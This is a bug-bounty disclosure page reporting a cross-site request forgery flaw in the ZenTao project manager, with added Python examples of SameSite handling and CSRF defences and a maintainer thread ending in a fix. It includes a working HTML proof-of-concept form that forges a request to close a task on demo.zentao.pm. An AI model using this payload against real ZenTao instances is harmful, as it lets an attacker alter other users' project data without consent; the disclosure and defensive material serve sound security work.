Cross-Site Request Forgery (CSRF) in easysoft/zentaopms

Valid

Reported on Jul 28th 2021


✍️ Description

When a cookie is set without a SameSite attribute, browsers apply a default of their own. Chrome and Chromium-based browsers default the attribute to "Lax", which means that if your site performs add/delete/alter operations in response to GET requests, it is still more vulnerable to CSRF attacks.

Firefox and Safari (two of the big ones), however, do not default to "Lax"; they treat the cookie as "None", which leaves both POST and GET requests more vulnerable to CSRF attacks.

In Firefox and Safari I can close/edit any project task with CSRF that users are already allowed to do manually.
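The browser-side rule the description relies on, written out as an added Python model (this is illustration code, not anything from zentaopms): given a cookie's SameSite attribute, the browser it runs in, and the request that a page initiates, it decides whether the cookie is attached. The browser names, the two-label "site" rule, the attacker origin and the cookie name are assumptions made for the example.

```python
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlsplit

# Added illustration of browser SameSite handling; not zentaopms code.
# Browser names and the two-label "site" rule are simplifying assumptions.

SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}


def site_of(url: str) -> str:
    """Return a simplified scheme + registrable-domain "site" for a URL.

    Real browsers consult the public-suffix list; this example assumes the
    registrable domain is the last two host labels.
    """
    parts = urlsplit(url)
    labels = (parts.hostname or "").split(".")
    return f"{parts.scheme}://{'.'.join(labels[-2:])}"


@dataclass
class Cookie:
    name: str
    # "Strict", "Lax", "None", or None when the attribute was not set at all
    samesite: Optional[str] = None


def effective_samesite(cookie: Cookie, browser: str) -> str:
    """Resolve the SameSite mode a browser will enforce for this cookie."""
    if cookie.samesite is not None:
        return cookie.samesite
    # Attribute absent: the report describes Chromium-based browsers defaulting
    # to Lax while Firefox and Safari behave as if it were None. Modelled as stated.
    return "Lax" if browser == "chromium" else "None"


def cookie_sent(cookie: Cookie, browser: str, initiator_url: str, target_url: str,
                method: str, top_level_navigation: bool) -> bool:
    """Decide whether the cookie accompanies a request to target_url that was
    initiated by a page at initiator_url (for example an auto-submitted form)."""
    mode = effective_samesite(cookie, browser)
    if site_of(initiator_url) == site_of(target_url) or mode == "None":
        return True          # same-site requests, and None cookies, always carry it
    if mode == "Strict":
        return False         # Strict: never on cross-site requests
    # Lax: cross-site only for top-level navigations that use a safe method
    return top_level_navigation and method.upper() in SAFE_METHODS


# Constructed scenario mirroring the PoC: a page on an attacker-controlled origin
# (placeholder host) submits a form to the task-close endpoint from the report.
SESSION = Cookie("session_cookie_placeholder")
ATTACKER_PAGE = "https://attacker.example/PoC.html"
TARGET = "https://demo.zentao.pm/task-close-104.html?onlybody=yes"


def poc_cookie_sent(browser: str, method: str = "POST") -> bool:
    """Would the session cookie ride along with the PoC's form submission?"""
    return cookie_sent(SESSION, browser, ATTACKER_PAGE, TARGET, method,
                       top_level_navigation=True)


if __name__ == "__main__":
    for b in ("chromium", "firefox", "safari"):
        print(f"{b:9s} POST form: cookie sent = {poc_cookie_sent(b)}")
    print("chromium  GET link : cookie sent =", poc_cookie_sent("chromium", "GET"))
    print("explicit Strict, GET:", cookie_sent(Cookie("s", "Strict"), "firefox",
                                               ATTACKER_PAGE, TARGET, "GET", True))
```

Under this model the PoC's cross-site POST carries the session cookie in Firefox and Safari but not in Chromium, while a state-changing GET link would carry it in all three, which is exactly why the description singles out GET-based operations under a Lax default. One real-world detail the model leaves out: Chromium's "Lax + POST" mitigation still sends a cookie without a SameSite attribute on a top-level cross-site POST for the first two minutes after it was set, so a Lax default is not a substitute for an explicit attribute and a server-side token.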

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.zentao.pm/task-close-104.html?onlybody=yes" method="POST">
      <input type="hidden" name="status" value="closed" />
      <input type="hidden" name="comment" value="nothings&#33;&#33;&#33;&#32;&#58;&#41;&#41;&lt;br&#32;&#47;&gt;" />
      <input type="hidden" name="uid" value="6101a5cf9d997" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Open PoC.html in the browser and click the button; afterwards you can see that the project task with id 104 has been closed.
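What the server side has to do for the request above to fail, as an added Python example (this is not zentaopms code and not the contents of the fix commit referenced later in the thread): an Origin/Referer check and a per-session synchronizer token, with the session cookie issued with an explicit SameSite attribute instead of relying on the browser default. The application origin is taken from the PoC's target URL; the cookie name and the attacker origin are assumptions.

```python
import hmac
import secrets
from typing import Optional, Tuple
from urllib.parse import urlsplit

# Added example of server-side CSRF defences; not code from zentaopms or its fix commit.
# APP_ORIGIN is taken from the PoC target URL; cookie name and attacker origin are assumed.

APP_ORIGIN = "https://demo.zentao.pm"


class Session:
    """Per-login server state holding a random synchronizer token."""

    def __init__(self) -> None:
        self.csrf_token = secrets.token_urlsafe(32)


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for the session. An explicit SameSite=Lax keeps the cookie
    off cross-site POSTs in every browser rather than trusting a per-browser default."""
    return f"zentaosid={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


def request_origin(headers: dict) -> Optional[str]:
    """Origin the browser attributes the request to, falling back to Referer."""
    origin = headers.get("Origin")
    if origin is None and headers.get("Referer"):
        p = urlsplit(headers["Referer"])
        origin = f"{p.scheme}://{p.netloc}"
    return origin


def verify_csrf(session: Session, headers: dict, form: dict) -> Tuple[bool, str]:
    """Two independent checks: the request must come from our own origin and must
    carry the token that was embedded in the form served to this session."""
    origin = request_origin(headers)
    if origin is None or origin == "null":
        return False, "missing Origin/Referer"        # fail closed; "null" is cross-origin too
    if origin != APP_ORIGIN:
        return False, f"cross-origin request from {origin}"
    token = form.get("csrf_token", "")
    # Constant-time comparison; encode so non-ASCII input cannot raise in compare_digest
    if not hmac.compare_digest(token.encode(), session.csrf_token.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


def close_task(session: Session, headers: dict, form: dict, task_id: int) -> dict:
    """State-changing handler guarded by verify_csrf (task_id comes from the URL)."""
    ok, reason = verify_csrf(session, headers, form)
    if not ok:
        return {"status": 403, "reason": reason}
    return {"status": 200, "task": task_id, "new_status": form["status"]}


# Constructed requests. The forged one carries the PoC's form fields (entities decoded);
# the browser adds the session cookie but cannot add the token or forge the Origin header.
POC_FORM = {"status": "closed", "comment": "nothings!!! :))<br />", "uid": "6101a5cf9d997"}
FORGED_HEADERS = {"Origin": "https://attacker.example", "Cookie": "zentaosid=placeholder"}


def demo() -> dict:
    """Run the forged PoC request, a same-origin request without a token, and a
    legitimate request through the guarded handler."""
    s = Session()
    forged = close_task(s, FORGED_HEADERS, POC_FORM, 104)
    no_token = close_task(s, {"Referer": APP_ORIGIN + "/task-view-104.html"}, POC_FORM, 104)
    legit = close_task(s, {"Origin": APP_ORIGIN}, dict(POC_FORM, csrf_token=s.csrf_token), 104)
    return {"forged": forged, "no_token": no_token, "legit": legit}


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:9s} -> {result}")
```

The two checks are deliberately independent: the Origin check alone stops the PoC as posted, and the token check alone stops it too, so a deployment that strips Referer headers or an endpoint reached by a client that omits Origin still has one working control. Auditing for this class of issue means listing every state-changing route (task-close in the PoC) and confirming the token is enforced on each, not just the ones the framework wires up by default.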

💥 Impact

This vulnerability makes it possible to close/edit any project task of any user.

We have contacted a member of the easysoft/zentaopms team and are waiting to hear back 3 years ago
Am
3 years ago

Researcher


Hey easysoft team, if you want any help or suggestions on these vulnerabilities, just tell me.

Am
3 years ago

Researcher


@admin

Hey man how are you today? :)

The maintainer said they can't find any link related to this report:

https://github.com/easysoft/zentaopms/issues/69#issuecomment-892313848

Jamie Slome
3 years ago

I am forwarding this to Ziding to look into further. Cheers!

Z-Old
3 years ago

Hey amammad, I've sent another email to them for you.

easysoft/zentaopms maintainer
3 years ago

Hello, we have received the reports and we'll check the issue.

Am
3 years ago

Researcher


Yeah sure, if you want any ideas for fixing these vulnerabilities I can help you.

easysoft/zentaopms maintainer
3 years ago

Hello, we have received the email and will check it soon. Thanks a lot.

easysoft/zentaopms maintainer
3 years ago

We will release a patch soon.

Am
3 years ago

Researcher


Thanks for your quick fix...

Can you just validate my reports until the patches are released, please?

easysoft/zentaopms maintainer
3 years ago

Thanks for your reports. I am a contributor to zentaopms. If we fix it, I will notify you.

Am
3 years ago

Researcher


Hey zentaopms team, I just want to make sure that you haven't had any problems; if you want any fix suggestions, tell me and feel free.

xia0ta0
3 years ago

Hello amammad, I enabled the csrf protection in zentaopms. The commit can fix the vulnerability. https://github.com/easysoft/zentaopms/commit/cb40696190d69efd95df055abbd330ab2cb72008

easysoft/zentaopms maintainer validated this vulnerability 3 years ago
am0o0 has been awarded the disclosure bounty
The fix bounty is now up for grabs
easysoft/zentaopms maintainer
3 years ago

We have fixed the issue on GitHub. When we fix the issue on huntr, the system needs us to select the fixer to be rewarded, but there's only "nobody" to be selected. Is that ok?

Am
3 years ago

Researcher


Yeah, it is ok, no problem.

Can you validate the other CSRF reports that I reported for different endpoints?

Am
3 years ago

Researcher


Can you give me any feedback about my last comment?

Am
3 years ago

Researcher


If you have a problem with the system you can use @admin in your comment to get an answer from them.

easysoft/zentaopms maintainer marked this as fixed with commit 5a9f7f 3 years ago
The fix bounty has been dropped
easysoft/zentaopms maintainer
3 years ago

@admin >> Can you validate the other CSRF reports that I reported for different endpoints? Where can I find these reports?

Am
3 years ago

Researcher


Hey dear @xia0ta0 and easysoft team, if you have already registered on huntr.dev you can see the content of the following reports:

https://www.huntr.dev/bounties/c4c79696-4431-4eb7-a334-1e2c766de86c/
https://www.huntr.dev/bounties/20099a57-8ea8-4c11-a46b-c1796b839f9c/
https://www.huntr.dev/bounties/8f04caa0-5545-4819-996a-a4701e4753aa/
https://www.huntr.dev/bounties/5690899e-9171-40bb-895a-77d015fa946f/
https://www.huntr.dev/bounties/98001390-98be-4dd9-8cf3-0c01cd02d2c4/
https://www.huntr.dev/bounties/00986980-56e7-4b3d-87e9-7eb29b320687/
https://www.huntr.dev/bounties/1c137804-4cb5-4bcb-be2e-68c33a6e04e5/

Jamie Slome
3 years ago

@maintainer - let me know if you need further support here!
